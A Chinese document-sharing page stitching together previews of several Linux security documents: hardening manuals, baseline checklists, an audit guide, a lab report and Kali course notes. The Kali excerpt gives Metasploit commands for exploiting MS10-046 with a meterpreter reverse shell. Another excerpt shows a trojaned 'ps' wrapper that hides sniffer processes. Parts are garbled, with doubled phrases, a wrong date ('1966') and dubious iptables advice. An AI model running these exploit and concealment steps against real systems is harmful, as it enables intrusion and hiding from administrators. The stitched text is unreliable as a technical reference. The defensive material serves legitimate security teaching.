linux操作系统安全设置

格式：docx
大小：34.64 KB
文档页数：21

下载文档原格式

《linux服务器配置与管理》课件15-任务十五 KALI操作系统的配置和使用

说明 ping扫描，Nmap在扫描端口时，默认都会使用ping扫描简单列表扫描使用PING主机方式监测端口服务版本操作系统信息主机名等半开扫描 TCP方式扫描，会在目标主机的日志中记录大批连接请求和错误信息。 UDP扫描，UDP扫描是不可靠的这项高级的扫描方法通常用来穿过防火墙的规则集秘密FIN数据包扫描、Xmas Tree、Null扫描模式脚本扫描全面系统检测、启用脚本检测、扫描等启用远程操作系统检测，但可能存在误报显示扫描过程，推荐使用扫描之前不使用ping命令指定端口，如“1-65535、1433、135、22、80、3389”等帮助文档针对TCP端口禁止动态扫描延迟超过10ms设置时间模板读取主机列表，“-iL D:\iplist.txt” 将报告写入文件，分别是正常、XML、grepable 三种格式路由跟踪扫描按照脚本分类进行扫描开启IPv6扫描
查找攻击Samba的模块
选择模块、设定攻击载荷
5.渗透实操：通过10-046漏洞攻击windows 7
对Wi数、配置监听地址
攻击载荷配置、开始攻击
本小节用到的命令 use exploit/windows/browser/ms10_046_shortcut_icon _dllloader set payload windows/meterpreter/reverse_tcp set SRVHOST 10.10.10.137 set RHOST 10.10.10.136 set LHOST 10.10.10.137
打开会话
基本操作20分
动手做20分（重现）
动手做20分（重构）
动手做20分（迁移）
拓展20分综合评价
评价指标及评价内容部署KALI操作系统开启SSH学习crunch密码工具学习aircrack安全工具使用NMAP工具学习aircrack安全工具破解 wifi密码学习安全漏洞检测工具攻击windows XP攻击windows 2003 攻击LINUX靶机攻击windows 7

linux操作系统安全评估作业指导书-V1.0

1.5
检查主机系统上是否存在可疑账户、克隆账户、多余的账户、过期的账户，共享账户；
1.6
检查所分配的账号权限配置是否符合安全基准要求；
1.7
检查linux主机的管理方式；当远程方式登录主机设备，是否取必要措施，防止鉴别信息在网络传输过程中被窃听；检查主机系统是否修改了远程桌面默认端口；检查主机系统上开启的默认共享或文件共享；
a.建议重要或外网的主机系统安装主机级别的入侵检测软件（NIDS）； b.建议每周对主机入侵检测软件告警日志进行分析； a.建议重要或外网的主机系统部署操作系统和应用系统日志远程备份措施，防止日志受到清除； b.建议远程备份的日志记录保存6个月以上； a.主机系统应部署补丁统一管理分发措施，如yum源或第三方工具； b.软件补丁更新措施，软件升级或修改配置等； a.操作系统应遵循最小安装的原则，仅安装需要的组件和应用程序；
1、查看系统审计文件more /etc/audit/auditd.conf或auditd -l log_file = /var/log/audit/audit.log #日志存放路径 log_format = RAW #日志记录格式 priority_boost = 3 #设置auditd的优先启动级，0的话是正常顺序启动 flush = INCREMENTAL #表示多少条记录一组写到磁盘 freq = 20 #审计守护进程在写到日志文件中之前从，内核中接收的记录数 num_logs = 4 #指定log的数目 dispatcher = /sbin/audispd #当启动这个守护进程时，由审计守护进程自动启动程序 disp_qos = lossy #控制调度程序与审计守护进程之间的通信类型 max_log_file = 5 #最大日志个数 max_log_file_action = ROTATE #当达到max_log_file的日志文件大小时采取的 1、以root身份登陆进入linux 2、查看linux密码文件内容 #cat/etc/shadow 记录没有被禁用的系统默认用户名采用查看方式，在root权限下，使用命令more、cat或vi查看/etc/passwd和 /etc/shadow文件中各用户名状态，查看是否存在以下可能无用的帐户： adm、lp、sync、shutdown、halt、news、uucp、operator、games、ftp、 postfix usermod -L <user> 锁定用户； a.在root权限下，使用命令more、cat或vi查看/etc/passwd和/etc/shadow文件中各用户名状态，查看是否存在以下可能无用的帐户： adm、lp、sync、shutdown、halt、news、uucp、operator、games、ftp、 postfix等 b.根据检查到的账户列表，访谈主机管理员是否有多余、过期和共享的账户； usermod -L <user> 锁定用户； userdel <user> 删除用户；

LINUX安全加固手册

LINUX安全加固手册目录1概述 (3)2 安装 (3)3 用户帐号安全Password and account security (4)3.1 密码安全策略 (4)3.2 检查密码是否安全 (4)3.3 Password Shadowing (4)3.4 管理密码 (4)3.5 其它 (5)4 网络服务安全(Network Service Security) (5)4.1服务过滤Filtering (6)4.2 /etc/inetd.conf (7)4.3 R 服务 (7)4.4 Tcp_wrapper (7)4.5 /etc/hosts.equiv 文件 (8)4.6 /etc/services (8)4.7 /etc/aliases (8)4.8 NFS (9)4.9 Trivial ftp (tftp) (9)4.10 Sendmail (9)4.11 finger (10)4.12 UUCP (10)4.13 World Wide Web (WWW) – httpd (10)4.14 FTP安全问题 (11)5 系统设置安全(System Setting Security) (12)5.1限制控制台的使用 (12)5.2系统关闭Ping (12)5.3关闭或更改系统信息 (12)5.4 /etc/securetty文件 (13)5.5 /etc/host.conf文件 (13)5.6禁止IP源路径路由 (13)5.7资源限制 (13)5.8 LILO安全 (14)5.9 Control-Alt-Delete 键盘关机命令 (14)5.10日志系统安全 (15)5.11修正脚本文件在“/etc/rc.d/init.d”目录下的权限 (15)6 文件系统安全(File System Security) (15)6.1文件权限 (15)6.2控制mount上的文件系统 (16)6.3备份与恢复 (16)7 其它 (16)7.1使用防火墙 (16)7.2使用第三方安全工具 (16)1概述近几年来Internet变得更加不安全了。

第6章操作系统安全技术

传递性: 传递性: 若a≤b且b≤c,则a≤c 且 , 非对称性: 非对称性若a≤b且b≤a,则a=b 且 , 代表实体, 代表主体, 代表敏若引入符号 O 代表实体,S 代表主体,≤代表敏感实体与主体的关系,我们有: 感实体与主体的关系,我们有 O≤S 当且仅当密级密级并且隔离组隔密级O≤密级密级S 隔离组O≤隔离组S 离组关系≤限制了敏感性及主体能够存取的信息内容限制了敏感性及主体能够存取的信息内容, 关系限制了敏感性及主体能够存取的信息内容, 只有当主体的许可证级别至少与该信息的级别一样高,且主体必须知道信息分类的所有隔离组时才能够存取. 够存取.
单层模型模型有一定的局限性, 单层模型模型有一定的局限性 , 在现代操作系统的设计中,使用了多级安全模型, 的设计中 , 使用了多级安全模型 , 信息流模型在其中得到了深入的应用.如著名的Bell-LaPadula模型中得到了深入的应用 . 如著名的模型模型. 和Biba模型. 模型
2. 多层网格模型
6.2 操作系统的安全设计
开发一个安全的操作可分为如下四个阶段: 开发一个安全的操作可分为如下四个阶段:建立安全模型,进行系统设计,可信度检查和系统实现. 全模型,进行系统设计,可信度检查和系统实现. 实现安全操作系统设计的方法有两种:一种是专门实现安全操作系统设计的方法有两种: 针对安全性面设计的操作系统; 针对安全性面设计的操作系统 ;另一种是将安全特性加入到期目前的操作系统中. 加入到期目前的操作系统中.
(3)加拿大的评价标准(CTCPEC) )加拿大的评价标准( ) 加拿大的评价标准(CTCPEC)的适用范围:政府部门.该标准与ITSCE相似,将安全分为两个部分:功能性需求和保证性需求 (4)美国联邦准则(FC) )美国联邦准则( ) 美国联邦准则(FC)是对TCSEC的升级,在该标准中引入了"保护轮廓"(PP)的概念,其每个保护轮廓包括: 功能,开发保证和评价. (5)国际通用准则(CC) )国际通用准则( ) 国际通用准则(CC)是国际标准化组织对现行多种安全标准统一的结果,是目前最全面的安全主价标准.CC的第一版是在1966年6月发布的,第二版是在1999年6月发布的,1999年10月发布了CC V2.1版,并成为ISO标准. 该标准的主要思想和框架结构取自ITSEC和FC,并允分突出"保护轮廓"的相思.CC将评估过程分为:功能和保证;评估等级分为:EAL1~EAL7

Linux系统安全：纵深防御、安全扫描与入侵检测_札记

《Linux系统安全：纵深防御、安全扫描与入侵检测》阅读笔记目录一、Linux系统安全概述 (2)1.1 Linux系统的重要性 (3)1.2 Linux系统的安全性问题 (4)1.3 Linux系统安全的挑战与对策 (5)二、纵深防御 (7)2.1 多层次防御架构 (9)2.2 入侵检测与防御系统(IDS/IPS) (10)2.3 防火墙与安全策略 (12)2.4 定期更新与补丁管理 (13)2.5 访问控制与权限管理 (14)三、安全扫描 (16)3.1 系统漏洞扫描 (17)3.2 应用程序扫描 (18)3.3 网络安全扫描 (19)3.4 威胁情报与风险分析 (20)四、入侵检测 (22)4.1 入侵检测系统(IDS)的工作原理 (24)4.2 入侵防御系统(IPS)的工作原理 (25)4.3 入侵检测与防御的实时性与准确性 (26)4.4 分布式入侵检测与响应系统 (28)五、案例分析 (29)5.1 某公司Linux系统攻击案例分析 (30)5.2 某企业Linux系统安全漏洞修复案例 (32)六、总结与展望 (33)6.1 本书小结 (34)6.2 Linux系统安全未来发展趋势 (35)一、Linux系统安全概述在信息化时代，随着Linux系统的广泛应用，其安全性问题日益凸显。

Linux系统安全是保障数据安全、网络正常运行的关键环节。

无论是企业还是个人用户，都需要重视Linux系统的安全防护，避免数据泄露、系统被攻击等安全风险。

Linux系统面临的安全威胁主要包括恶意攻击、病毒入侵、漏洞利用等。

恶意攻击者可能通过网络攻击手段获取系统权限，进而窃取数据或破坏系统正常运行。

病毒入侵则可能通过伪装成合法软件，悄无声息地感染用户系统，导致数据损坏或泄露。

软件漏洞也是攻击者常常利用的手段，他们可能利用未修复的漏洞侵入系统。

为了保障Linux系统的安全，我们需要遵循一些基本原则。

最小权限原则，即每个用户和程序只拥有执行其任务所需的最小权限。

Linux系统安全实验报告

Linux系统安全实验报告院系：班级：姓名：学号：2010年10月26日一、实验目的通过实验熟悉Linux 环境下的用户管理和文件管理的相关操作命令，掌握Linux 操作系统中的相关系统安全配置的方法。

二、实验原理1 ．用户管理Linux 系统支持以命令行或窗口方式管理用户和用户组。

它提供了安全的用户名和口令文件保护以及强大的口令设置规则，并对用户和用户组的权限进行细粒度的划分。

Linux 系统的用户和用户组的信息分别保存在/etc/shadow、/etc/passwd、etc/group和/etc/gshadow 等几个文件中，为这些文件设置较高的安全权限是完全必要的。

在较高安全要求的系统中，可以将这些文件设置为不可更改。

Linux 系统中也带有一些常用的口令字典，以便在用户设置的口令不太安全时及时的提醒用户。

2 ．文件管理在Linux 操作系统中，文件和目录的权限根据其所属的用户或用户组来划分：(1)文件所属的用户，即文件的创建者。

(2)文件所属用户组的用户，即文件创建者所在的用户组中的其它用户。

(3)其它用户，即文件所属用户组之外的其它用户。

每个文件或者目录的拥有者以及管理员root 用户，可以为上述3 种用户或用户组设置读、写或可执行的权限。

用户也可以通过改变文件所属的用户和组改变3 类用户的权限。

对文件夹设置SGID 权限，任何在该目录中创建的文件和子目录都将与其父目录属于同样的用户组。

这种管理有时是必要的，有时会带来一定的安全问题，因此在建立文件时要特别小心文件夹的SGID 权限位。

另一个容易带来安全问题的文件是/home/*/.basheshistory (*表示某用户名）。

为了便于重复输入很长的命令，该文件保存了此用户曾经使用的一定数目（系统默认为500 或1000 ) 的命令。

这样就暴露了一些重要信息，例如文件的路径，一些与用户身份有关的密码等，为攻击的黑客留下了可乘之机。

可以通过设置/etc/profile 文件中的参数设置，减少保留的命令数目。

操作系统安全基线配置

操作系统安全基线配置要求为不同用户分配独立的帐户，不允许多个用户共享同一帐户。

应删除或锁定过期或无用的帐户。

只允许指定授权帐户对主机进行远程访问。

应根据实际需要为各个帐户分配最小权限。

应对Administrator帐户进行重命名，并禁用Guest（来宾）帐户。

要求操作系统帐户口令长度至少为8位，且应为数字、字母和特殊符号中至少2类的组合。

设置口令的最长使用期限小于90天，并配置操作系统用户不能重复使用最近5次（含5次）已使用过的口令。

当用户连续认证失败次数为5次时，应锁定该帐户30分钟。

2.2.服务及授权安全应关闭不必要的服务。

应设置SNMP接受团体名称不为public或弱字符串。

确保系统时间与NTP服务器同步。

配置系统DNS指向企业内部DNS服务器。

2.3.补丁安全应确保操作系统版本更新至最新。

应在确保业务不受影响的情况下及时更新操作系统补丁。

2.4.日志审计应合理配置系统日志审核策略。

应设置日志存储规则，保证足够的日志存储空间。

更改日志默认存放路径，并定期对系统日志进行备份。

2.5.系统防火墙应启用系统自带防火墙，并根据业务需要限定允许通讯的应用程序或端口。

2.6.防病毒软件应安装由总部统一部署的防病毒软件，并及时更新。

2.7.关闭自动播放功能应关闭Windows自动播放功能。

2.8.共享文件夹应关闭Windows本地默认共享。

设置共享文件夹的访问权限，仅允许授权的帐户共享此文件夹。

2.9.登录通信安全应禁止远程访问注册表路径和子路径。

设置远程登录帐户的登录超时时间为30分钟。

禁用匿名访问命名管道和共享。

1.帐户共用：每个用户应分配一个独立的系统帐户，不允许多个用户共享同一个帐户。

2.帐户锁定：过期或无用的帐户应该被删除或锁定。

3.超级管理员远程登录限制：应限制root帐户的远程登录。

4.帐户权限最小化：为每个帐户设置最小权限，以满足其实际需求。

5.口令长度及复杂度：操作系统帐户口令长度应至少为8位，且应包含数字、字母和特殊符号中的至少2种组合。

kali网络安全设置教程

kali网络安全设置教程Kali Linux是一个基于Debian的Linux发行版，专注于渗透测试和网络安全。

在使用Kali Linux进行网络安全测试之前，我们需要进行一些基本的网络安全设置，以确保我们的系统和数据的安全。

以下是Kali Linux网络安全设置的教程。

1. 更新系统：首先，使用以下命令更新系统的软件包和依赖项：```sudo apt updatesudo apt upgrade```这将确保你的系统是最新的，并修补已知漏洞和安全问题。

2. 防火墙设置：Kali Linux默认启用了防火墙，称为iptables。

你可以使用以下命令检查防火墙状态：```sudo iptables -L```如果防火墙状态是“active”，则表示它已经启用。

如果它是“inactive”，则需要启用它：```sudo iptables -A INPUT -j DROPsudo iptables -A OUTPUT -j DROP```这将阻止任何进出系统的网络连接。

可以稍后逐个打开需要的端口。

3. 禁用不必要的服务：Kali Linux默认安装了许多网络服务，其中一些可能不是必需的。

你可以使用以下命令列出所有正在运行的服务：```sudo service --status-all```通过观察输出，可以确定哪些服务在系统启动时自动启动，并决定是否禁用它们：```sudo update-rc.d <service-name> remove```将"<service-name>"替换为要禁用的服务的实际名称。

4. 定期备份：定期备份系统和数据是很重要的。

使用KaliLinux的自带工具或第三方备份软件创建定期备份，以防止数据丢失。

5. 强密码策略：修改用户的密码策略，配置更强的密码。

使用以下命令修改密码策略：```sudo apt install libpam-pwqualitysudo nano /etc/pam.d/common-password```将文件中的"password requisitepam_pwquality.so retry=3"修改为"password requisite pam_pwquality.so retry=3 minlen=8 ucredit=-1 lcredit=-1dcredit=-1 ocredit=-1"。

中标麒麟Linux操作系统安全概述

预防：
代码审计最小权限运行程序限制程序数量限制客户端访问服务
网络的安全性：
中间人攻击
窃听数据注入 Session劫持
认证和加密数据以保护数据的完整性及机密性
对称加密：DES,AES,BLOWFISH,ETC. Hash:crc-32,md5,sha-1,etc. 非对称加密：RSA,EIGamal
PAM and SELinux
验证用户是否可访问服务
针对独立的服务控制访问时间、使用限制、位置限制等
1、mv ps psbak 2 、 cat >ps #!/bin/sh psbak $1|grep -v sniff|grep -v grep|grep -v psbak|gawk
'{gsub(/sh \/bin\//, "",$0);print}‘ [ctrl+d]
3、chmod 755 ps
扩大战果使用john破解软件使用Sniff类监听器捕获敏感数据安装Dos软件攻击其他主机利用此服务器的信任关系进行内网攻
TCP Wrappers适用于链接libwrap.so的服务：
Daemon list:client list:ALLOW|DENY Daemon list:client list:severity [fac].pri
• Log connections
Daemon list:client list:spawn|twist command
• 工程问题
– 时间进度安排 – 分布实施及实施决策筛选 – 应急备案
防护机制
一定要有一套防护策略：
入侵检测验证和评估入侵入侵后恢复报告入侵策略执行的文档
防护方法

通用linux系统安全加固

通用linux系统安全加固手册1帐户安全配置要求1.1创建/e t c/s h a d o w影子口令文件配置项名称设置影子口令模式检查方法执行：#more /etc/shadow查看是否存在该文件操作步骤1、执行备份：#cp –p /etc/passwd /etc/passwd_bak 2、切换到影子口令模式：#pwconv回退操作执行：#pwunconv#cp /etc/passwd_bak /etc/passwd风险说明系统默认使用标准口令模式，切换不成功可能导致整个用户管理失效1.2建立多帐户组，将用户账号分配到相应的帐户组配置项名称建立多帐户组，将用户账号分配到相应的帐户组检查方法1、执行：#more /etc/group#more /etc/shadow查看每个组中的用户或每个用户属于那个组2、确认需要修改用户组的用户操作步骤1、执行备份：#cp –p /etc/group /etc/group_bak2、修改用户所属组：# usermod –g group username回退操作执行：#cp /etc/group_bak /etc/group风险说明修改用户所属组可能导致某些应用无法正常运行1.3删除或锁定可能无用的帐户配置项名称删除或锁定可能无用的帐户检查方法1、执行：#more /etc/passwd查看是否存在以下可能无用的帐户：hpsmh、named、uucp、nuucp、adm、daemon、bin、lp 2、与管理员确认需要锁定的帐户操作步骤1、执行备份：#cp –p /etc/passwd /etc/passwd_bak 2、锁定无用帐户：#passwd -l username回退操作执行：#cp /etc/passwd_bak /etc/passwd风险说明锁定某些用户可能导致某些应用无法正常运行1.4删除可能无用的用户组配置项名称删除可能无用的用户组检查方法1、执行：#more /etc/group查看是否存在以下可能无用的用户组：lp nuucp nogroup2、与管理员确认需要删除的用户组操作步骤1、执行备份：#cp –p /etc/group /etc/group_bak 2、删除无用的用户组：#groupdel groupname回退操作执行：#cp /etc/group_bak /etc/group风险说明删除某些组可能导致某些应用无法正常运行1.5检查是否存在空密码的帐户配置项名称检查是否存在空密码的帐户检查方法执行下列命令，检查是否存在空密码的帐户logins –p应无回结果操作步骤1、执行备份：#cp –p /etc/passwd /etc/passwd_bak#cp -p /etc/shadow /etc/shadow_bak2、锁定空密码帐户或使用passwd命令设置复杂密码#passwd –l username回退操作执行：#cp –p /etc/passwd_bak /etc/passwd #cp -p /etc/shadow_bak /etc/shadow风险说明锁定某些帐户可能导致某些应用无法正常运行1.6设置口令策略满足复杂度要求配置项名称设置口令策略满足复杂度要求检查方法1、执行下列命令，检查是否存在空密码的帐户#logins –p应无返回结果2、执行：#more /etc/default/security检查是否满足以下各项复杂度参数：MIN_PASSWORD_LENGTH=6 PASSWORD_MIN_UPPER_CASE_CHARS=1 PASSWORD_MIN_LOWER_CASE_CHARS=1 PASSWORD_MIN_DIGIT_CHARS=1 PASSWORD_MIN_SPECIAL_CHARS=1操作步骤1、执行备份：#cp –p /etc/default/security /etc/default/security_bak #cp –p /etc/passwd /etc/passwd_bak2、执行下列命令，编辑/etc/default/security#vi /etc/default/security修改以下各项复杂度参数：MIN_PASSWORD_LENGTH=6PASSWORD_MIN_UPPER_CASE_CHARS=1 PASSWORD_MIN_LOWER_CASE_CHARS=1 PASSWORD_MIN_DIGIT_CHARS=1 PASSWORD_MIN_SPECIAL_CHARS=1回退操作执行：#cp /etc/default/security_bak /etc/default/security #cp /etc/passwd_bak /etc/passwd风险说明可能导致非root用户修改自己的密码时多次不成功1.7设置帐户口令生存周期配置项名称设置帐户口令生存周期检查方法执行：#more /etc/default/security查看是否存在以下各项参数：PASSWORD_MAXDAYS=90 PASSWORD_WARNDAYS=28操作步骤1、执行备份：#cp –p /etc/default/security /etc/default/security_bak #cp –p /etc/passwd /etc/passwd_bak2、执行下列命令，编辑/etc/default/security#vi /etc/default/security修改以下各项参数：PASSWORD_MAXDAYS=90PASSWORD_WARNDAYS=28回退操作执行：#cp /etc/default/security_bak /etc/default/security #cp /etc/passwd_bak /etc/passwd风险说明可能在密码过期后影响正常使用及维护1.8设定密码历史，不能重复使用最近5次（含5次）内已使用的口令配置项名称应配置设备，使用户不能重复使用最近5次（含5次）内已使用的口令检查方法执行：#more /etc/default/security查看是否存在以下参数：PASSWORD_HISTORY_DEPTH=5操作步骤1、执行备份：#cp –p /etc/default/security /etc/default/security_bak #cp –p /etc/passwd /etc/passwd_bak2、执行下列命令，编辑/etc/default/security#vi /etc/default/security修改以下参数：PASSWORD_HISTORY_DEPTH=5回退操作执行：#cp /etc/default/security_bak /etc/default/security #cp /etc/passwd_bak /etc/passwd风险说明低风险1.9限制r o o t用户远程登录配置项名称root用户远程登录限制检查方法执行：#more /etc/securetty检查是否有下列行：Console执行：#more /opt/ssh/etc/sshd_config 检查是否有PermitRootLogin no操作步骤1、执行备份：#cp –p /etc/securetty / etc/securetty_bak#cp -p /opt/ssh/etc/sshd_config /opt/ssh/etc/sshd_config_bak 2、新建一个普通用户并设置高强度密码：#useradd username#passwd username3、禁止root用户远程登录系统：#vi /etc/securetty去掉console前面的注释，保存退出#vi /opt/ssh/etc/sshd_config将PermitRootLogin后的yes改为no回退操作执行：#cp /etc/securetty_bak /etc/securetty#cp -p /opt/ssh/etc/sshd_config_bak /opt/ssh/etc/sshd_config风险说明严重改变维护人员操作习惯，必须新建一个能够执行交互式登录的普通用户并能够通过su提升权限，可能带来新的威胁1.10检查p a s s w d、g r o u p文件权限设置配置项名称检查passwd、group文件权限设置检查方法执行：#ls –l /etc/passwd /etc/group操作步骤1、执行备份：#cp –p /etc/passwd /etc/passwd_bak #cp –p /etc/group /etc/group_bak 2、修改文件权限：#chmod 644 /etc/passwd#chmod 644 /etc/group回退执行：#cp /etc/passwd_bak /etc/passwd #cp /etc/group_bak /etc/group风险说明权限设置不当可能导致无法执行用户管理，并可能造成某些应用运行异常1.11删除帐户目录下的.n e t r c/.r h o s t s/.s h o s t s文件配置项名称删除帐户目录下的.netrc/.rhosts/.shosts文件检查方法执行下列命令，检查帐户目录下是否存在.netrc/.rhosts/.shosts文件# logins -ox | cut -f6 -d: | grep /home/ | while read dir; do ls -a "$dir" ;done操作步骤1、执行备份：使用cp命令备份.netrc/.rhosts/.shosts文件2、删除文件：使用rm -f命令删除.netrc/.rhosts/.shosts文件回退操作使用cp命令恢复被删除的.netrc/.rhosts/.shosts文件风险说明可能影响需要使用远程连接的应用1.12系统u m a s k设置配置项名称系统umask设置检查方法执行：#more /etc/profile 检查系统umask值操作步骤1、执行备份：#cp -p /etc/profile /etc/profile_bak 2、修改umask设置：#vi /etc/profile将umask值修改为027，保存退出回退操作执行：#cp /etc/profile_bak /etc/profile风险说明umask设置不当可能导致某些应用无法正确自动创建目录或文件，从而运行异常2访问、认证安全配置要求2.1远程登录取消t e l n e t采用s s h配置项名称远程登录取消telnet采用ssh检查方法查看SSH、telnet服务状态：#ps –elf | grep ssh#ps –elf | grep telnetSSH服务状态查看结果为：online telnet服务状态查看结果为：disabled操作步骤1、备份#cp –p /etc/inetd.conf /etc/inetd.conf_bak2、修改/etc/inetd.conf文件，将telnet行注释掉#telnet stream tcp nowait root /usr/lbin/telnetd telnetd3、安装ssh软件包，通过#/opt/ssh/sbin/sshd start来启动SSH。

1、下载文档前请自行甄别文档内容的完整性，平台不提供额外的编辑、内容补充、找答案等附加服务。
2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
3、如文档侵犯您的权益，请联系客服反馈,我们会尽快为您处理(人工客服工作时间：9:00-18:30)。

linux操作系统安全设置众所周知，网络安全是一个非常重要的课题，而服务器是网络安全中最关键的环节。

Linux被认为是一个比较安全的Internet服务器，作为一种开放源代码操作系统，一旦Linux系统中发现有安全漏洞，Internet上来自世界各地的志愿者会踊跃修补它。

下面大家与店铺一起来学习一下linux操作系统安全设置吧。

linux操作系统安全设置一、服务器安全1. 关闭无用的端口任何网络连接都是通过开放的应用端口来实现的。

如果我们尽可能少地开放端口，就使网络攻击变成无源之水，从而大大减少了攻击者成功的机会。

首先检查你的inetd.conf文件。

inetd在某些端口上守侯，准备为你提供必要的服务。

如果某人开发出一个特殊的inetd守护程序，这里就存在一个安全隐患。

你应当在inetd.conf文件中注释掉那些永不会用到的服务(如：echo、gopher、rsh、rlogin、rexec、ntalk、finger等)。

注释除非绝对需要，你一定要注释掉rsh、rlogin和rexec，而telnet建议你使用更为安全的ssh来代替，然后杀掉lnetd进程。

这样inetd不再监控你机器上的守护程序，从而杜绝有人利用它来窃取你的应用端口。

你最好是下载一个端口扫描程序扫描你的系统，如果发现有你不知道的开放端口，马上找到正使用它的进程，从而判断是否关闭它们。

2. 删除不用的软件包在进行系统规划时，总的原则是将不需要的服务一律去掉。

默认的Linux就是一个强大的系统，运行了很多的服务。

但有许多服务是不需要的，很容易引起安全风险。

这个文件就是/etc/inetd.conf，它制定了/usr/sbin/inetd将要监听的服务，你可能只需要其中的两个：telnet和ftp，其它的类如shell、login、exec、talk、ntalk、imap、pop-2、pop-3、finger、auth 等，除非你真的想用它，否则统统关闭。

3. 不设置缺省路由在主机中，应该严格禁止设置缺省路由，即default route。

建议为每一个子网或网段设置一个路由，否则其它机器就可能通过一定方式访问该主机。

4. 口令管理口令的长度一般不要少于8个字符，口令的组成应以无规则的大小写字母、数字和符号相结合，严格避免用英语单词或词组等设置口令，而且各用户的口令应该养成定期更换的习惯。

另外，口令的保护还涉及到对/etc/passwd和/etc/shadow文件的保护，必须做到只有系统管理员才能访问这2个文件。

安装一个口令过滤工具加npasswd，能帮你检查你的口令是否耐得住攻击。

如果你以前没有安装此类的工具，建议你现在马上安装。

如果你是系统管理员，你的系统中又没有安装口令过滤工具，请你马上检查所有用户的口令是否能被穷尽搜索到，即对你的/ect/passwd文件实施穷尽搜索攻击。

5. 分区管理一个潜在的攻击，它首先就会尝试缓冲区溢出。

在过去的几年中，以缓冲区溢出为类型的安全漏洞是最为常见的一种形式了。

更为严重的是，缓冲区溢出漏洞占了远程网络攻击的绝大多数，这种攻击可以轻易使得一个匿名的Internet用户有机会获得一台主机的部分或全部的控制权!为了防止此类攻击，我们从安装系统时就应该注意。

如果用root 分区记录数据，如log文件，就可能因为拒绝服务产生大量日志或垃圾邮件，从而导致系统崩溃。

所以建议为/var开辟单独的分区，用来存放日志和邮件，以避免root分区被溢出。

最好为特殊的应用程序单独开一个分区，特别是可以产生大量日志的程序，还建议为/home单独分一个区，这样他们就不能填满/分区了，从而就避免了部分针对Linux分区溢出的恶意攻击。

6. 防范网络嗅探嗅探器技术被广泛应用于网络维护和管理方面，它工作的时候就像一部被动声纳，默默的接收看来自网络的各种信息，通过对这些数据的分析，网络管理员可以深入了解网络当前的运行状况，以便找出网络中的漏洞。

在网络安全日益被注意的今天。

我们不但要正确使用嗅探器。

还要合理防范嗅探器的危害。

嗅探器能够造成很大的安全危害，主要是因为它们不容易被发现。

对于一个安全性能要求很严格的企业，同时使用安全的拓扑结构、会话加密、使用静态的ARP地址是有必要的。

7. 完整的日志管理日志文件时刻为你记录着你的系统的运行情况。

当黑客光临时，也不能逃脱日志的法眼。

所以黑客往往在攻击时修改日志文件，来隐藏踪迹。

因此我们要限制对/var/log文件的访问，禁止一般权限的用户去查看日志文件。

另外，我们还可以安装一个icmp/tcp日志管理程序，如iplogger，来观察那些可疑的多次的连接尝试(加icmp flood3或一些类似的情况)。

还要小心一些来自不明主机的登录。

完整的日志管理要包括网络数据的正确性、有效性、合法性。

对日志文件的分析还可以预防入侵。

例如、某一个用户几小时内的20次的注册失败记录，很可能是入侵者正在尝试该用户的口令。

8. 终止正进行的攻击假如你在检查日志文件时，发现了一个用户从你未知的主机登录，而且你确定此用户在这台主机上没有账号，此时你可能正被攻击。

首先你要马上锁住此账号(在口令文件或shadow文件中，此用户的口令前加一个Ib或其他的字符)。

若攻击者已经连接到系统，你应马上断开主机与网络的物理连接。

如有可能，你还要进一步查看此用户的历史记录，查看其他用户是否也被假冒，攻击音是否拥有根权限。

杀掉此用户的所有进程并把此主机的ip地址掩码加到文件 hosts.deny中。

9. 使用安全工具软件随着Linux病毒的出现，现在已经有一些Linux服务器防病毒软件，安装Linux防病毒软件已经是非常迫切了。

Linux也已经有一些工具可以保障服务器的安全，如iplogger。

10. 使用保留IP地址维护网络安全性最简单的方法是保证网络中的主机不同外界接触。

最基本的方法是与公共网络隔离。

然而，这种通过隔离达到的安全性策略在许多情况下是不能接受的。

这时，使用保留IP地址是一种简单可行的方法，它可以让用户访问Internet同时保证一定的安全性。

- RFC 1918规定了能够用于本地 TCP/IP网络使用的IP地址范围，这些IP地址不会在Internet上路由，因此不必注册这些地址。

通过在该范围分配IP地址，可以有效地将网络流量限制在本地网络内。

这是一种拒绝外部计算机访问而允许内部计算机互联的快速有效的方法。

保留IP地址范围：—— 10.0.0.0 - 10.255.255.255---- 172.16.0.0 - 172.31.255.255—— 192.168.0.0 - 192.168.255.255来自保留IP地址的网络交通不会经过Internet路由器，因此被赋予保留IP地址的任何计算机不能从外部网络访问。

但是，这种方法同时也不允许用户访问外部网络。

IP伪装可以解决这一问题。

11. 选择发行版本对于服务器使用的Linux版本，既不使用最新的发行版本，也不选择太老的版本。

应当使用比较成熟的版本：前一个产品的最后发行版本如Mandrake 8.2 Linux等。

毕竟对于服务器来说安全稳定是第一的。

12. 补丁问题你应该经常到你所安装的系统发行商的主页上去找最新的补丁。

二、网络设备的安全1. 交换机的安全启用VLAN技术：交换机的某个端口上定义VLAN ，所有连接到这个特定端口的终端都是虚拟网络的一部分，并且整个网络可以支持多个VLAN。

VLAN通过建立网络防火墙使不必要的数据流量减至最少，隔离各个VLAN间的传输和可能出现的问题，使网络吞吐量大大增加，减少了网络延迟。

在虚拟网络环境中，可以通过划分不同的虚拟网络来控制处于同一物理网段中的用户之间的通信。

这样一来有效的实现了数据的__，而且配置起来并不麻烦，网络管理员可以逻辑上重新配置网络，迅速、简单、有效地平衡负载流量，轻松自如地增加、删除和修改用户，而不必从物理上调整网络配置。

2. 路由器的安全根据路由原理安全配置路由器路由器是整个网络的核心和心脏，保护路由器安全还需要网管员在配置和管理路由器过程中采取相应的安全措施。

(1)堵住安全漏洞限制系统物理访问是确保路由器安全的最有效方法之一。

限制系统物理访问的一种方法就是将控制台和终端会话配置成在较短闲置时间后自动退出系统。

避免将调制解调器连接至路由器的辅助端口也很重要。

一旦限制了路由器的物理访问，用户一定要确保路由器的安全补丁是最新的。

(2)避免身份危机入侵者常常利用弱口令或默认口令进行攻击。

加长口令、选用30到60天的口令有效期等措施有助于防止这类漏洞。

另外，一旦重要的IT员工辞职，用户应该立即更换口令。

用户应该启用路由器上的口令加密功能。

(3)禁用不必要服务近来许多安全事件都凸显了禁用不需要本地服务的重要性。

需要注意的是，一个需要用户考虑的因素是定时。

定时对有效操作网络是必不可少的。

即使用户确保了部署期间时间同步，经过一段时间后，时钟仍有可能逐渐失去同步。

用户可以利用名为网络时。

